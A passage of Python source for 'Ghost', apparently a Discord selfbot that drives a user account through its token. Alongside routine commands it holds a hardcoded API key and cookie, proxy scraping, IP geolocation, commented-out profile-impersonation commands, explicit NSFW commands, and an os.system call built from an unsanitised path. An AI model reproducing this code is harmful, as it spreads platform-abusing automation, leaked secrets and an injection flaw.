await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send("Text mode is already enabled.", delete_after=__deletetimeout__)
@Ghost.command(name="readall", description="Mark every message as read.", usage="readall")
async def readall(ctx):
index = 0
index2 = 0
DiscumClient = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
for guild in Ghost.guilds:
messages2 = []
for channel in guild.text_channels:
index+=1
try:
messages = await channel.history(limit=1, oldest_first=False).flatten()
for message in messages:
index2+=1
messages2.append({"channel_id": str(channel.id), "message_id": str(message.id)})
print_info(f"({channel.name}) Fetched new messages to read.")
except:
pass
DiscumClient.bulkAck(messages2)
print_info(f"Read all messages in {guild.name}.")
print_info("All messages have been read.")
await ctx.send(f"Read a total of `{index}` channels and `{index2}` messages.")
@Ghost.command(name="specs", description="Your computers specifications.", usage="specs", aliases=["computerspecs", "pcspecs", "specifications", "systeminfo"])
async def specs(ctx):
def get_size(bytes, suffix="B"):
factor = 1024
for unit in ["", "K", "M", "G", "T", "P"]:
if bytes < factor:
return f"{bytes:.2f}{unit}{suffix}"
bytes /= factor
uname = platform.uname()
svmem = psutil.virtual_memory()
system = uname.system
machine = uname.machine
cpu = platform.processor()
ram = str(get_size(svmem.used)) + "/" + str(get_size(svmem.total))
gpus = []
for gpu in GPUtil.getGPUs():
gpus.append(gpu.name)
if gpus == []:
gpus = "N/A"
if __embedmode__:
embed = discord.Embed(title="Specifications", color=__embedcolour__)
embed.add_field(name="System", value=f"```{system}```")
embed.add_field(name="Machine", value=f"```{machine}```")
embed.add_field(name="RAM", value=f"```{ram}```")
embed.add_field(name="CPU", value=f"```{cpu}```")
embed.add_field(name="GPUs", value=f"```{', '.join(gpus)}```")
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.set_thumbnail(url=__embedimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Specifications ]
System: {system}
Machine: {machine}
CPU: {cpu}
GPUs: {', '.join(gpus).replace("N, /, A", "N/A")}
RAM: {ram}
# {__embedfooter__}
```""", delete_after=__deletetimeout__)
@Ghost.command(name="crypto", description="Get the current data on a cryptocurrency.", usage="crypto [currency]", aliases=["cryptodata", "cryptostats"])
async def crypto(ctx, *, currency="bitcoin"):
request = requests.get(f"https://api.coingecko.com/api/v3/coins/{currency}")
if request.status_code == 200:
request = request.json()
if __embedmode__:
embed = discord.Embed(title=f"{request['name']} Data", color=__embedcolour__)
embed.add_field(name="Scores", value=f"""```
Coingecko score: {request['coingecko_score']}
Liquidity score: {request['liquidity_score']}
Developer score: {request['developer_score']}
Commuinity score: {request['community_score']}
```""", inline=False)
embed.add_field(name="Current Prices", value=f"""```
USD: {'{:,}'.format(request['market_data']['current_price']['usd'])}
CAD: {'{:,}'.format(request['market_data']['current_price']['cad'])}
AUD: {'{:,}'.format(request['market_data']['current_price']['aud'])}
GBP: {'{:,}'.format(request['market_data']['current_price']['gbp'])}
EUR: {'{:,}'.format(request['market_data']['current_price']['eur'])}
```""", inline=False)
embed.add_field(name="Last 24h Price Change", value=f"""```
USD: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['usd'])}
CAD: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['cad'])}
AUD: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['aud'])}
GBP: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['gbp'])}
EUR: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['eur'])}
```""", inline=False)
embed.set_thumbnail(url=request["image"]["large"])
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ {request['name']} Data ]
[Scores]
Coingecko score: {request['coingecko_score']}
Liquidity score: {request['liquidity_score']}
Developer score: {request['developer_score']}
Commuinity score: {request['community_score']}
[Current Prices]
USD: {'{:,}'.format(request['market_data']['current_price']['usd'])}
CAD: {'{:,}'.format(request['market_data']['current_price']['cad'])}
AUD: {'{:,}'.format(request['market_data']['current_price']['aud'])}
GBP: {'{:,}'.format(request['market_data']['current_price']['gbp'])}
EUR: {'{:,}'.format(request['market_data']['current_price']['eur'])}
[Last 24h Price Change]
USD: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['usd'])}
CAD: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['cad'])}
AUD: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['aud'])}
GBP: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['gbp'])}
EUR: {'{:,}'.format(request['market_data']['price_change_24h_in_currency']['eur'])}
# {__embedfooter__}
```""")
else:
if __embedmode__:
embed = discord.Embed(title="Invalid Crypto", description="That crypto currency doesnt exist or there was an error.", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ Invalid Crypto ]
That crypto currency doesnt exist or there was an error.
# {__embedfooter__}
```""")
@Ghost.command(name="proxies", description="Scrape an type of proxy.", usage="proxies [http, https, socks4, socks5, all]", aliases=["proxygen", "genproxies", "proxyscrape"])
async def proxies(ctx, type):
if type == "http":
if not os.path.isdir("data/proxies/"): os.makedirs("data/proxies/");
file = open("data/proxies/http.txt", "a+")
request = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=http&timeout=5000")
proxies = []
for proxy in request.text.split("\n"):
proxy = proxy.strip()
if proxy:
proxies.append(proxy)
file.write(str(proxy)+"\n")
file.close()
await ctx.send(content=f"Scraped `{len(proxies)}` HTTP proxies.", file=discord.File("data/proxies/http.txt"))
if type == "https":
if not os.path.isdir("data/proxies/"): os.makedirs("data/proxies/");
file = open("data/proxies/https.txt", "a+")
request = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=https&timeout=5000")
proxies = []
for proxy in request.text.split("\n"):
proxy = proxy.strip()
if proxy:
proxies.append(proxy)
file.write(str(proxy)+"\n")
file.close()
await ctx.send(content=f"Scraped `{len(proxies)}` HTTPS proxies.", file=discord.File("data/proxies/https.txt"))
if type == "socks4":
if not os.path.isdir("data/proxies/"): os.makedirs("data/proxies/");
file = open("data/proxies/socks4.txt", "a+")
request = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=socks4&timeout=5000")
proxies = []
for proxy in request.text.split("\n"):
proxy = proxy.strip()
if proxy:
proxies.append(proxy)
file.write(str(proxy)+"\n")
file.close()
await ctx.send(content=f"Scraped `{len(proxies)}` SOCKS4 proxies.", file=discord.File("data/proxies/socks4.txt"))
if type == "socks5":
if not os.path.isdir("data/proxies/"): os.makedirs("data/proxies/");
file = open("data/proxies/socks5.txt", "a+")
request = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=socks5&timeout=5000")
proxies = []
for proxy in request.text.split("\n"):
proxy = proxy.strip()
if proxy:
proxies.append(proxy)
file.write(str(proxy)+"\n")
file.close()
await ctx.send(content=f"Scraped `{len(proxies)}` SOCKS5 proxies.", file=discord.File("data/proxies/socks5.txt"))
if type == "all":
if not os.path.isdir("data/proxies/"): os.makedirs("data/proxies/");
file = open("data/proxies/all.txt", "a+")
request = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=all&timeout=5000")
proxies = []
for proxy in request.text.split("\n"):
proxy = proxy.strip()
if proxy:
proxies.append(proxy)
file.write(str(proxy)+"\n")
file.close()
await ctx.send(content=f"Scraped `{len(proxies)}` HTTP, HTTPS, SOCKS4 AND SOCKS5 proxies.", file=discord.File("data/proxies/all.txt"))
# @Ghost.command(name="stealusername", description="Steal someones username.", usage="stealusername [@user]", aliases=["stealname"])
# async def stealusername(ctx, user:discord.User):
# DiscumClient = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
# username = user.name
# DiscumClient.setUsername(username)
# await ctx.send(f"Stolen `{user}`'s username.", delete_after=__deletetimeout__)
# @Ghost.command(name="stealprofile", description="Steal someones avatar and username.", usage="stealprofile [@user]")
# async def stealprofile(ctx, user:discord.User):
# DiscumClient = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
# avatar = user.avatar
# username = user.name
# extension = str(avatar)[:-10][-3:]
# open(f"data/pfpstealavatar.{extension}", "wb").write(requests.get(str(avatar), allow_redirects=True).content)
# DiscumClient.setAvatar(f"data/pfpstealavatar.{extension}")
# DiscumClient.setUsername(username)
@Ghost.command(name="cloneemoji", description="Clone an emoji to the command server.", usage="cloneemoji [emoji]", aliases=["stealemoji", "emojisteal", "copyemoji"])
async def cloneemoji(ctx, *, msg):
msg = re.sub("<:(.+):([0-9]+)>", "\\2", msg)
match = None
exact_match = False
for guild in Ghost.guilds:
for emoji in guild.emojis:
if msg.strip().lower() in str(emoji):
match = emoji
if msg.strip() in (str(emoji.id), emoji.name):
match = emoji
exact_match = True
break
if exact_match:
break
if not match:
return await ctx.send("Couldnt find that emoji.")
response = requests.get(match.url)
emoji = await ctx.guild.create_custom_emoji(name=match.name, image=response.content)
await ctx.send(f"Successfully cloned `{emoji.name}`.")
@Ghost.command(name="detections", description="A list of all detections.", usage="detections", aliases=["triggers"])
async def detections(ctx):
cfg = Config.getConfig()
_list = []
for key, value in cfg["detections"].items():
if __embedmode__:
_list.append(f"**{key}** : {value}")
else:
_list.append(f"{key} : {value}")
if __embedmode__:
embed = discord.Embed(title="Detections", description='\n'.join(_list), color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send("```ini\n[ Detections ]\n " + "\n".join(_list) + "\n\n# " + __embedfooter__ + "```")
@Ghost.command(name="snipers", description="A list of all snipers.", usage="snipers")
async def snipers(ctx):
cfg = Config.getConfig()
_list = []
for key, value in cfg["snipers"].items():
if __embedmode__:
_list.append(f"**{key}** : {value}")
else:
_list.append(f"{key} : {value}")
if __embedmode__:
embed = discord.Embed(title="Snipers", description='\n'.join(_list), color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send("```ini\n[ Snipers ]\n " + "\n".join(_list) + "\n\n# " + __embedfooter__ + "```")
@Ghost.command(name="enabledetect", description="Enable a detection.", usage="enabledetect [type]", aliases=["enabledetection", "enabledetections"])
async def enabledetect(ctx, *, type):
cfg = Config.getConfig()
success = False
for key, value in cfg["detections"].items():
if type.lower() == key.lower():
cfg["detections"][key] = True
Config.saveConfig(cfg)
success = True
if success:
await ctx.send(f"Enabled `{type}` detection.")
else:
await ctx.send(f"Couldnt find `{type}` detection.")
@Ghost.command(name="disabledetect", description="Disable a detection.", usage="disabledetect [type]", aliases=["disabledetection", "disabledetections"])
async def disabledetect(ctx, *, type):
cfg = Config.getConfig()
success = False
for key, value in cfg["detections"].items():
if type.lower() == key.lower():
cfg["detections"][key] = False
Config.saveConfig(cfg)
success = True
if success:
await ctx.send(f"Disabled `{type}` detection.")
else:
await ctx.send(f"Couldnt find `{type}` detection.")
@Ghost.command(name="enablesniper", description="Enable a sniper.", usage="enablesniper [type]", aliases=["enablesnipers"])
async def enablesniper(ctx, *, type):
cfg = Config.getConfig()
success = False
for key, value in cfg["snipers"].items():
if type.lower() == key.lower():
cfg["snipers"][key] = True
Config.saveConfig(cfg)
success = True
if success:
await ctx.send(f"Enabled `{type}` sniper.")
else:
await ctx.send(f"Couldnt find `{type}` sniper.")
@Ghost.command(name="disablesniper", description="Disable a sniper.", usage="disablesniper [type]", aliases=["disablesnipers"])
async def disablesniper(ctx, *, type):
cfg = Config.getConfig()
success = False
for key, value in cfg["snipers"].items():
if type.lower() == key.lower():
cfg["snipers"][key] = False
Config.saveConfig(cfg)
success = True
if success:
await ctx.send(f"Disabled `{type}` sniper.")
else:
await ctx.send(f"Couldnt find `{type}` sniper.")
# @Ghost.command(name="ghostusers", description="Finds all the people using Ghost in a server.", usage="ghostusers")
# @commands.guild_only()
# async def ghostusers(ctx):
# message = await ctx.send("Looking for people that have Ghost, this may take a while...")
# ghostUsers = []
# userAgent = get_random_user_agent()
# try:
# await ctx.message.delete()
# except:
# pass
# DiscumClient = discum.Client(token=__token__, user_agent=f"{userAgent}")
# @DiscumClient.gateway.command
# def getmembers(resp):
# guild_id = f'{ctx.guild.id}'
# channel_id = f'{ctx.channel.id}'
# if resp.event.ready_supplemental:
# DiscumClient.gateway.fetchMembers(guild_id, channel_id, wait=1)
# if DiscumClient.gateway.finishedMemberFetching(guild_id):
# DiscumClient.gateway.removeCommand(getmembers)
# DiscumClient.gateway.close()
# DiscumClient.gateway.run()
# for memberID in DiscumClient.gateway.session.guild(f'{ctx.guild.id}').members:
# member = await ctx.guild.fetch_member(int(memberID))
# ghostguild = await Ghost.fetch_guild(838869729829191681)
# mutualGuilds = member.mutual_guilds
# for guild in mutualGuilds:
# print(guild.name)
# DiscumClient.gateway.close()
# if __embedmode__:
# embed=discord.Embed(
# title="Ghost Users",
# description=f"There are a total of `{len(ghostUsers)}` Ghost users in `{ctx.guild.name}`\n \n```\n" + ", ".join(ghostUsers) + f"\n```",
# color=__embedcolour__
# )
# embed.set_thumbnail(url=__embedimage__)
# embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
# embed.timestamp = datetime.now()
# await message.edit(content="", embed=embed)
# else:
# await message.edit(content=f"""```ini
# [ Ghost Users ]
# There is a total of {len(ghostUsers)} in {ctx.guild.name}.
# {', '.join(ghostUsers)}
# # {__embedfooter__}
# ```""")
@Ghost.command(name="addccmd", description="Add a custom command.", usage="addccmd [name] [response]", aliases=["addcustomcommand", "addusercommand"])
async def addccmd(ctx, name, *, response):
global ccmd
customCommands = json.load(open("customcommands.json"))
customCommands[name] = response
json.dump(customCommands, open("customcommands.json", "w"), indent=4, sort_keys=False)
ccmd = json.load(open("customcommands.json"))
await ctx.send(f"Added `{Ghost.command_prefix}{name}` to your custom commands.", delete_after=__deletetimeout__)
@Ghost.command(name="delccmd", description="Remove a custom command.", usage="delccmd [name]", aliases=["deletecustomcommand", "delcustomcommand", "removecustomcommand", "removeccmd", "deleteccmd"])
async def delccmd(ctx, name):
global ccmd
customCommands = json.load(open("customcommands.json"))
customCommands.pop(name)
json.dump(customCommands, open("customcommands.json", "w"), indent=4, sort_keys=False)
ccmd = json.load(open("customcommands.json"))
await ctx.send(f"Removed `{Ghost.command_prefix}{name}` from your custom commands", delete_after=__deletetimeout__)
@Ghost.command(name="boobs", description="Pictures or videos of boobs.", usage=f"boobs", aliases=["tits", "tit", "milkers", "titties", "boob", "melons"])
async def boobs(ctx):
type = "boobs"
image = get_nsfw(type)
if image.endswith("png") or image.endswith("jpeg") or image.endswith("jpg") or image.endswith("gif"):
embed = discord.Embed(title=f"{type}", color=__embedcolour__)
embed.set_image(url=image)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(image)
@Ghost.command(name="ass", description="Pictures or videos of ass.", usage=f"ass", aliases=["badonkadonk"])
async def ass(ctx):
type = "ass"
image = get_nsfw(type)
if image.endswith("png") or image.endswith("jpeg") or image.endswith("jpg") or image.endswith("gif"):
if __embedmode__:
embed = discord.Embed(title=f"{type}", color=__embedcolour__)
embed.set_image(url=image)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(image)
else:
await ctx.send(image)
@Ghost.command(name="pussy", description="Pictures or videos of pussy.", usage=f"pussy")
async def pussy(ctx):
type = "pussy"
image = get_nsfw(type)
if image.endswith("png") or image.endswith("jpeg") or image.endswith("jpg") or image.endswith("gif"):
if __embedmode__:
embed = discord.Embed(title=f"{type}", color=__embedcolour__)
embed.set_image(url=image)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(image)
else:
await ctx.send(image)
@Ghost.command(name="porngif", description="Porn gifs.", usage=f"porngif")
async def porngif(ctx):
type = "porngif"
image = get_nsfw(type)
if image.endswith("png") or image.endswith("jpeg") or image.endswith("jpg") or image.endswith("gif"):
if __embedmode__:
embed = discord.Embed(title=f"{type}", color=__embedcolour__)
embed.set_image(url=image)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(image)
else:
await ctx.send(image)
@Ghost.command(name="neko", description="Pictures or videos of nsfw nekos.", usage=f"hentai", aliases=["nsfwneko"])
async def hentai(ctx):
type = random.randint(1, 2)
if type == 1:
image = requests.get("https://nekos.life/api/lewd/neko").json()["neko"]
elif type == 2:
image = requests.get("https://nekos.life/api/v2/img/nsfw_neko_gif").json()["url"]
if __embedmode__:
embed = discord.Embed(title=f"hentai", color=__embedcolour__)
embed.set_image(url=image)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(image)
@Ghost.command(name="discordtheme", description="Change default Discord theme.", usage="discordtheme [light/dark]")
async def discordtheme(ctx, theme = "dark"):
theme = theme.lower()
validThemes = ["dark", "light"]
if theme in validThemes:
DiscumClient = discum.Client(token=__token__, user_agent=get_random_user_agent(), log=False)
DiscumClient.setTheme(theme)
await ctx.send(f"Set Discord theme to `{theme}`.", delete_after=__deletetimeout__)
else:
await ctx.send("That isn't a valid Discord theme.", delete_after=__deletetimeout__)
@Ghost.command(name="changehypesquad", description="Change your hypesquad house.", usage="changehypesquad [bravery/brilliance/balance]")
async def changehypesquad(ctx, house):
house = house.lower()
houses = ["bravery", "brilliance", "balance"]
if house in houses:
DiscumClient = discum.Client(token=__token__, user_agent=get_random_user_agent(), log=False)
DiscumClient.setHypesquad(house)
await ctx.send(f"Changed your hypesquad house to `{house[:1].upper() + house[1:].lower()}`.", delete_after=__deletetimeout__)
else:
await ctx.send("That isn't a valid hypesquad house.", delete_after=__deletetimeout__)
@Ghost.command(name="backupfriends", description="Backup all your friend's user IDs to a file.", usage="backupfriends", aliases=["friendbackup"])
async def backupfriends(ctx):
print_info("Grabbing all friends...")
request = requests.get("https://discord.com/api/v6/users/@me/relationships", headers={"authorization": __token__})
json = request.json()
ids = []
blockedIds = []
incoming = []
outgoing = []
for item in json:
if item["type"] == 1:
print_info(f'Backed up {str(item["user"]["username"]) + "#" + str(item["user"]["discriminator"])}!')
ids.append(
str(item["id"]) +
" : " +
str(item["user"]["username"]) +
"#" + str(item["user"]["discriminator"])
)
if item["type"] == 2:
print_info(f'Backed up a blocked user : {str(item["user"]["username"]) + "#" + str(item["user"]["discriminator"])}')
blockedIds.append(
str(item["id"]) +
" : " +
str(item["user"]["username"]) +
"#" + str(item["user"]["discriminator"])
)
if item["type"] == 3:
print_info(f'Backed up an incoming friend request : {str(item["user"]["username"]) + "#" + str(item["user"]["discriminator"])}')
incoming.append(
str(item["id"]) +
" : " +
str(item["user"]["username"]) +
"#" + str(item["user"]["discriminator"])
)
if item["type"] == 4:
print_info(f'Backed up an outgoing friend request : {str(item["user"]["username"]) + "#" + str(item["user"]["discriminator"])}')
outgoing.append(
str(item["id"]) +
" : " +
str(item["user"]["username"]) +
"#" + str(item["user"]["discriminator"])
)
print_info("Backed up all friends!")
await ctx.send(f"Backed up a total of `{len(ids)}` friends, `{len(blockedIds)}` blocked, `{len(outgoing)}` outgoing friend requests and `{len(incoming)}` incoming friend requests to __data/friends.txt__.", delete_after=__deletetimeout__)
if not ids:
ids.append("Couldnt find any friends.")
if not blockedIds:
blockedIds.append("Couldnt find any blocked users.")
if not outgoing:
outgoing.append("Couldnt find any outgoing friend requests.")
if not incoming:
incoming.append("Couldnt find any incoming friend requests.")
file = codecs.open("data/friends.txt", "w", encoding="utf-8")
file.write(
"Current Friends\n===============\n" + "\n".join(ids) +
"\n \nOutgoing Requests\n=================\n" + "\n".join(outgoing) +
"\n \nIncoming Requests\n=================\n" + "\n".join(incoming) +
"\n \nBlocked Users\n=============\n" + "\n".join(blockedIds)
)
file.close()
@Ghost.command(name="backupservers", description="Backup all your servers and try to create invites for each one.", usage="backupservers", aliases=["backupguilds", "serverbackup", "guildbackup"])
async def backupservers(ctx):
DiscumClient = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
try:
await ctx.message.delete()
except:
pass
print_info("Saving and creating invites for your guilds with a 4 second interval...")
guilds = requests.get("https://discordapp.com/api/v6/users/@me/guilds", headers={"authorization": __token__}).json()
print_info("Grabbing all the guilds...")
guildsIdsAndInvites = []
for item in guilds:
guildid = item["id"]
guildname = item["name"]
invite = ""
print_info(f"Trying to create invite for {guildname}")
server = discord.utils.get(Ghost.guilds, id=int(guildid))
for channel in server.text_channels:
if invite == "":
invite = DiscumClient.createInvite(str(channel.id))
if invite.status_code == 200:
invite = invite.json()["code"]
else:
invite = ""
break
if invite == "":
invite = "Failed to create an invite."
guildsIdsAndInvites.append(item["name"] + " : " + str(item["id"]) + " : discord.gg/" + str(invite))
await asyncio.sleep(4)
print_info(f"Saved guilds data.")
file = codecs.open("data/servers.txt", "w", encoding="utf-8")
file.write("\n".join(guildsIdsAndInvites))
file.close()
await ctx.send("Saved a list of all your guilds and their IDs in __data/servers.txt__.", delete_after=__deletetimeout__)
@Ghost.command(name="richpresence", description="Enable or disable rich presence.", usage="richpresence [on/off]", aliases=["rpc"])
async def richpresence(ctx, status):
if status == "on" or status == "On":
richpresence = json.load(open("richpresence.json"))
richpresence["enabled"] = True
json.dump(richpresence, open('richpresence.json', 'w'), sort_keys=False, indent=4)
await ctx.send("Rich presence has been enabled, restarting to change effect...", delete_after=__deletetimeout__)
restart_bot()
elif status == "off" or status == "Off":
richpresence = json.load(open("richpresence.json"))
richpresence["enabled"] = False
json.dump(richpresence, open('richpresence.json', 'w'), sort_keys=False, indent=4)
await ctx.send("Rich presence has been disabled, restarting to change effect...", delete_after=__deletetimeout__)
restart_bot()
@Ghost.command(name="spacechannel", description="Create a channel with spaces.", usage="spacechannel [channel name]")
async def spacechannel(ctx, *, channelName = "example channel name"):
channelName = channelName.replace(" ", channelBlankChar)
await ctx.guild.create_text_channel(name=channelName)
if __embedmode__:
embed = discord.Embed(title=f"Space Channel", description=f"Created a channel with the name `{channelName}`.", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Space Channel ]
Created a channel with the name {channelName}.
# {__embedfooter__}
```""")
@Ghost.command(name="uwu", description="Translate your messages to uwu!", usage="uwu [message]")
async def uwu__(ctx, *, message):
uwued = uwuify.uwu(message)
await ctx.send(uwued)
@Ghost.command(name="uwuify", description="Automatically translate all your sent messages to uwu!", usage="uwuify")
async def uwuify__(ctx):
global uwuifyEnabled
if (uwuifyEnabled):
uwuifyEnabled = False
await ctx.send("All your messages will no longer be translated to uwu.", delete_after=__deletetimeout__)
else:
uwuifyEnabled = True
await ctx.send("All your messages will now be translated to uwu.", delete_after=__deletetimeout__)
@Ghost.command(name="geoip", description="Get information from an IP address.", usage="geoip [ip]", aliases=["iplookup", "lookupip", "ipinfo", "iplocation"])
async def geoip(ctx, ip):
data = requests.get(f"http://ip-api.com/json/{ip}").json()
data2 = requests.get(f"https://ipqualityscore.com/api/json/ip/oOswzMILsf8QA7JGtaQDdXARfDtbKW1K/{ip}").json()
country = data["country"]
city = data["city"]
zipCode = data["zip"]
lat = data["lat"]
lon = data["lon"]
isp = data["isp"]
as1 = data["as"]
region = data["regionName"]
vpn = data2["vpn"]
hostname = data2["host"]
if __embedmode__:
embed = discord.Embed(title=f"{ip} information...", color=__embedcolour__)
embed.add_field(name="Country", value=f"```{country}```", inline=False)
embed.add_field(name="City", value=f"```{city}```", inline=True)
embed.add_field(name="Region", value=f"```{region}```", inline=True)
embed.add_field(name="ZIP", value=f"```{zipCode}```", inline=True)
embed.add_field(name="LAT", value=f"```{lat}```", inline=True)
embed.add_field(name="LON", value=f"```{lon}```", inline=True)
embed.add_field(name="VPN", value=f"```{vpn}```", inline=True)
embed.add_field(name="AS", value=f"```{as1}```", inline=False)
embed.add_field(name="ISP", value=f"```{isp}```", inline=False)
embed.add_field(name="Hostname", value=f"```{hostname}```", inline=False)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ {ip} information.. ]
Country: {country}
City: {city}
Region: {region}
ZIP: {zipCode}
LAT: {lat}
LON: {lon}
VPN: {vpn}
AS: {as1}
ISP: {isp}
Hostname: {hostname}
# {__embedfooter__}
```""", delete_after=__deletetimeout__)
@Ghost.command(name="invite", description="Get Ghost's Discord server invite link.", usage="invite", aliases=["serverinvite", "serverinv"])
async def invite(ctx):
print_info(f"Discord server invite: {discordServer}")
@Ghost.command(name="pytoexe", description="Convert a PY file to an executable.", usage="pytoexe [path]", aliases=["pythontoexe", "py2exe", "python2exe"])
async def pytoexe(ctx, *, path):
pyFile = False
file = path.split("/")[-1]
if (file.endswith(".py")):
pyFile = True
if (pyFile):
file = file[:-3]
if __embedmode__:
embed = discord.Embed(title=f"PY To Executable", description="Conversion for your file has started, check the console for more information.", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
message = await ctx.send(embed=embed)
else:
message = await ctx.send(f"""```ini
[ PY To Executable ]
Conversion for your file has started, check the console for more information.
# {__embedfooter__}
```""")
print_info("Converting your file to an exe using pyinstaller...\nThis will fill your console and possibly take a while.")
os.system(f'pyinstaller -n "{file}" -i "icon.ico" --onefile --distpath "pytoexe/" {path}')
print_info("Conversion complete!")
print(f"{fg.cYellow}Path: {fg.cGrey}pytoexe/{file}.exe")
if __embedmode__:
embed = discord.Embed(title=f"PY To Executable", description="Conversion for your file has completed! Check the console for more information.", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await message.edit(content="", embed=embed)
else:
await message.edit(content=f"""```ini
[ PY To Executable ]
Converstion for your file has completed! Check the console for more information.
# {__embedfooter__}
```""")
else:
if __embedmode__:
embed = discord.Embed(title=f"PY To Executable", description="The path you submitted does not link to a PY file.", color=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send(f"""```ini
[ PY To Executable ]
The path you submitted does not link to a PY file.
# {__embedfooter__}
```""")
@Ghost.command(name="statuscycle", description="Start a custom status cycle.", usage="statuscycle", aliases=["cyclestatus"])
async def statuscycle(ctx):
global cycleStatus
if (cycleStatus is False):
cycleStatus = True
else:
cycleStatus = False
def changeStatus(text2, token):
url = "https://discordapp.com/api/v8/users/@me/settings"
payload="{\r\n \"custom_status\": {\r\n \"text\": \"" + text2 + "\"\r\n }\r\n}"
headers = {
'Authorization': token,
'Content-Type': 'application/json',
'Cookie': '__cfduid=d7e8d2784592da39fb3f621664b9aede51620414171; __dcfduid=24a543339247480f9b0bb95c710ce1e6'
}
requests.request("PATCH", url, headers=headers, data=payload)
async def loopStatus(text):
while cycleStatus is True:
for word in text.split(" "):
changeStatus(word, __token__)
await asyncio.sleep(1)
Ghost.loop.create_task(loopStatus(cycleStatusText))
if (cycleStatus is True):
await ctx.send(f"Now looping your custom status.", delete_after=__deletetimeout__)
else:
await ctx.send(f"No longer looping your custom status.", delete_after=__deletetimeout__)
@Ghost.command(name="statuscycletext", description="Set the text used in status cycle.", usage="statuscycletext [text]", aliases=["cyclestatustext"])
async def statuscycletext(ctx, *, text: str):
global cycleStatusText
cycleStatusText = text
await ctx.send(f"Status cycle text set to `{cycleStatusText}`", delete_after=__deletetimeout__)
@Ghost.command(name="ghostping", description="Ping a user then delete the message.", usage="ghostping [@user]")
async def ghostping(ctx, user: discord.User):
pass
@Ghost.command(name="getmessage", description="Get a message by ID.", usage="getmessage [message id]", aliases=["fetchmessage", "getmsg", "fetchmsg"])
async def getmessage(ctx, messageid: int):
msg = await ctx.send("Getting the message . . .")
message = await get_message(ctx, messageid)
if __embedmode__:
embed = discord.Embed(title=f"Get Message", color=__embedcolour__)
embed.add_field(name="Content", value=f"```{message.content}```", inline=True)
embed.add_field(name="Author", value=f"```{message.author}```", inline=True)
embed.add_field(name="Message Link", value=message.jump_url, inline=False)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await msg.edit(content="", embed=embed, delete_after=__deletetimeout__)
else:
await msg.edit(content=f"""```ini
[ Get Message ]
Content: {message.content}
Author: {message.author}
Message Link: {message.jump_url}
# {__embedfooter__}
```""", delete_after=__deletetimeout__)
@Ghost.command(name="watchdogstats", description="Get stats about Hypixel's Anticheat, Watchdog", usage="watchdogstats", aliases=["hypixelstats", "banstats", "acstats"])
async def watchdogstats(ctx):
if CONFIG["api_keys"]["hypixel"] == "":
if __embedmode__:
embed = discord.Embed(description="This command requires a hypixel API key.", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
